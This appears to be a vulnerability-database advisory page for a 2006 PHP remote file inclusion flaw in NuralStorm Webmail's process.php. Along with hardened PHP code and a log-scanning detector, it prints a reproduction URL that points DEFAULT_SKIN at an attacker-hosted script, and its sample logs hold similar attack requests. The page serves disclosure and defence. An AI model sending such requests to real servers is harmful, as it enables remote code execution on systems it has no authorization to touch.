VYPR
Severity: Unrated · NVD Advisory · Published Oct 18, 2006 · Updated Jun 16, 2026

CVE-2006-5386

Description

PHP remote file inclusion vulnerability in process.php in NuralStorm Webmail 0.98b and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the DEFAULT_SKIN parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

  • cpe:2.3:a:nuralstorm:nuralstorm_webmail:0.98b:*:*:*:*:*:*:*
  • NuralStorm Webmail (no CPE), version range: <=0.98b

Patches

Vulnerability mechanics

Root cause

"Missing input sanitization of the $DEFAULT_SKIN parameter in process.php allows remote file inclusion."

Attack vector

An attacker sends a crafted HTTP GET request to `process.php` with the `DEFAULT_SKIN` parameter set to a URL pointing to a malicious PHP script. Because `register_globals` is enabled, the attacker-supplied request parameter is automatically assigned to the `$DEFAULT_SKIN` variable. When the script includes this variable (likely in an `include()` or `require()` call), PHP fetches and executes the remote file, giving the attacker arbitrary code execution on the server [ref_id=1].

Affected code

The vulnerability exists in `process.php` of NuralStorm Webmail 0.98b and earlier. The `$DEFAULT_SKIN` parameter is used directly without sanitization, allowing inclusion of a remote file via a URL [ref_id=1].

What the fix does

No patch is provided in the bundle. The advisory recommends sanitizing the `$DEFAULT_SKIN` variable before use, and notes that disabling `register_globals` would also prevent the attack vector [ref_id=1]. Without a fix, administrators should disable `register_globals` in PHP configuration as a mitigation.
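The advisory's two recommendations (validate `$DEFAULT_SKIN` before use, and stop relying on `register_globals`) can be illustrated side by side. The following is an added example written for this page, not code from NuralStorm Webmail; the `$skinDir` location, the skin names and the `skin.php` file name are assumptions made for illustration.

```php
<?php
// Added example (not NuralStorm Webmail's own code): the include pattern the
// advisory describes, followed by a hardened replacement. $skinDir, the skin
// list and the skin.php file name are assumptions made for illustration.

// --- Vulnerable pattern, shown for contrast (kept commented out) -------------
// With register_globals=On, a request containing
// ?DEFAULT_SKIN=http://example.invalid/x.txt populates $DEFAULT_SKIN before
// this line runs, and include() fetches and executes the remote file.
//
//     include($DEFAULT_SKIN . '/skin.php');

// --- Hardened replacement ----------------------------------------------------
// Returns the absolute path of the skin file to load, or null if the
// requested skin is not acceptable. The caller falls back to the default skin.
function resolveSkinPath(?string $requested, string $skinDir, array $allowedSkins): ?string
{
    if ($requested === null || $requested === '') {
        $requested = 'default';
    }

    // 1. Shape check: a skin is a plain directory name. This rejects URL
    //    schemes ("http://"), path separators and ".." components outright.
    if (!preg_match('/^[A-Za-z0-9_-]{1,32}$/', $requested)) {
        return null;
    }

    // 2. Allowlist: only skins that ship with the application may be loaded.
    if (!in_array($requested, $allowedSkins, true)) {
        return null;
    }

    // 3. Confinement: build the path from a fixed server-side base and confirm
    //    with realpath() that the resolved file really lives under $skinDir.
    $base = realpath($skinDir);
    $path = realpath($skinDir . '/' . $requested . '/skin.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage: read the parameter explicitly from $_GET instead of relying on
// register_globals, validate it, and only then hand it to require.
$allowedSkins = ['default', 'blue', 'classic'];
$skinDir      = __DIR__ . '/skins';

$skinPath = resolveSkinPath($_GET['DEFAULT_SKIN'] ?? null, $skinDir, $allowedSkins)
         ?? resolveSkinPath('default', $skinDir, $allowedSkins);

if ($skinPath === null) {
    http_response_code(500);
    exit('Skin directory is missing or misconfigured.');
}
require $skinPath;
```

The shape check alone already blocks the URL described in the advisory, but the allowlist and the `realpath()` confinement mean the include target can never be anything other than a file the administrator shipped, even if `register_globals` is later turned back on. Reading the value from `$_GET` explicitly removes the dependency on `register_globals` that the advisory identifies as the precondition.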

Preconditions

  • config: PHP register_globals must be enabled on the server
  • network: Attacker must be able to send HTTP GET requests to the vulnerable process.php endpoint
  • input: The DEFAULT_SKIN parameter is not sanitized before use in a file inclusion operation

Reproduction

Send a request to the vulnerable application: `http://www.site.com/[path]/process.php?DEFAULT_SKIN=http://attacker.com/evil_script.txt` [ref_id=1]. The remote PHP code at the attacker-controlled URL will be executed on the target server.
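From the defender's side, the request shape above is easy to spot in web server logs: a `DEFAULT_SKIN` value that carries a URL scheme is never a legitimate skin name. The following is an added example, not part of the advisory, that scans Apache combined-format access log lines for such requests to `process.php`; the log lines are constructed samples and the hosts use the reserved `.invalid` TLD.

```php
<?php
// Added example, not part of the advisory: scan Apache combined-format access
// log lines for requests to process.php whose DEFAULT_SKIN value carries a URL,
// which is the request shape the advisory describes. The log lines are
// constructed samples; hosts use the reserved .invalid TLD.

// Returns one entry per suspicious request: [client IP, decoded DEFAULT_SKIN value].
function findRemoteSkinRequests(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $line) {
        // Client IP is the first field; the request target is inside the quoted request line.
        if (!preg_match('/^(\S+) .*?"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        [, $clientIp, $target] = $m;

        // Split the target at the first '?' rather than using parse_url(), so a
        // "://" inside the query string cannot confuse the parsing.
        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue;
        }
        $path  = substr($target, 0, $qpos);
        $query = substr($target, $qpos + 1);
        if (basename($path) !== 'process.php') {
            continue;
        }

        // parse_str() percent-decodes, so an encoded "http%3A%2F%2F" is caught too.
        parse_str($query, $params);
        if (!isset($params['DEFAULT_SKIN']) || !is_string($params['DEFAULT_SKIN'])) {
            continue;
        }
        $value = $params['DEFAULT_SKIN'];

        // A legitimate skin is a plain name; anything with a URL scheme is suspect.
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value)) {
            $hits[] = [$clientIp, $value];
        }
    }
    return $hits;
}

// Constructed sample log lines: one benign skin switch, two remote-inclusion
// attempts (one percent-encoded), and one hit on an unrelated script.
$sampleLog = [
    '203.0.113.5 - - [18/Oct/2006:10:00:01 +0000] "GET /webmail/process.php?DEFAULT_SKIN=blue HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Oct/2006:10:00:02 +0000] "GET /webmail/process.php?DEFAULT_SKIN=http://evil.invalid/s.txt HTTP/1.1" 200 1024 "-" "curl/7.15"',
    '198.51.100.7 - - [18/Oct/2006:10:00:03 +0000] "GET /webmail/process.php?action=login&DEFAULT_SKIN=https%3A%2F%2Fevil.invalid%2Fs.txt%3F HTTP/1.1" 200 1024 "-" "curl/7.15"',
    '203.0.113.9 - - [18/Oct/2006:10:00:04 +0000] "GET /webmail/index.php?DEFAULT_SKIN=http://evil.invalid/s.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
];

foreach (findRemoteSkinRequests($sampleLog) as [$ip, $value]) {
    printf("suspicious DEFAULT_SKIN from %s: %s\n", $ip, $value);
}
```

Run against the sample lines it reports only the two `process.php` requests from `198.51.100.7`: the plain `blue` skin and the request to `index.php` are ignored. Because the check is on the decoded value, percent-encoded schemes are treated the same as literal ones.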

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References
